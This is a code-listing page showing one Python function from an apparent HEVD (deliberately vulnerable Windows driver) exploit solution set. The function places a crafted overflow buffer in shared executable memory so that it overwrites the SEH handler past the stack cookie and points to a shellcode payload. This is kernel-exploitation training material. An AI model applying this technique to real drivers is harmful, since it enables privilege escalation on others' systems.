HEVD_stackoverflowGS.py 文件源码

python
阅读 22 收藏 0 点赞 0 评论 0
项目:HEVD-Python-Solutions 作者: GradiusX 项目源码 文件源码 
def create_map_file():
    page_size = 0x1000
    FILE_MAP_ALL_ACCESS = 0x1F
    SEH_overwrite_offset = 0x214

    print "[+] Creating file mapping"
    shared_memory = kernel32.CreateFileMappingA(-1, None, win32con.PAGE_EXECUTE_READWRITE, 0, page_size, "SharedMemory")

    print "[+] Mapping it to current process space"
    shared_mapped_memory_address = kernel32.MapViewOfFile( shared_memory , FILE_MAP_ALL_ACCESS, 0, 0, page_size)
    print "[+] Map View of File at address: 0x%X" % shared_mapped_memory_address

    suitable_memory_for_buffer = shared_mapped_memory_address + (page_size - SEH_overwrite_offset)
    print "[+] Suitable Memory for Buffer address: 0x%X" % suitable_memory_for_buffer

    print "[+] Constructing malicious buffer"
    # [-- JUNK FOR PAGE --][-- KERNEL BUFFER SIZE--][-- STACK COOKIE --][-- JUNK --][-- SE/SHELLCODE PTR --]
    malicious_buffer = "A" * (page_size - SEH_overwrite_offset) + "B" * 0x200 + "S" * 4 + "C" * 12 + struct.pack("<L",heap_alloc_payload())
    malicious_buffer_len = len(malicious_buffer)

    print "[+] Copying malicious buffer to file map"
    csrc = create_string_buffer(malicious_buffer, malicious_buffer_len)
    ctypes.memmove(shared_mapped_memory_address, addressof(csrc), malicious_buffer_len)
    return suitable_memory_for_buffer, SEH_overwrite_offset
您未登录,请先登录后再评论
评论列表
文章目录


问题


面经


文章

微信
公众号

扫码关注公众号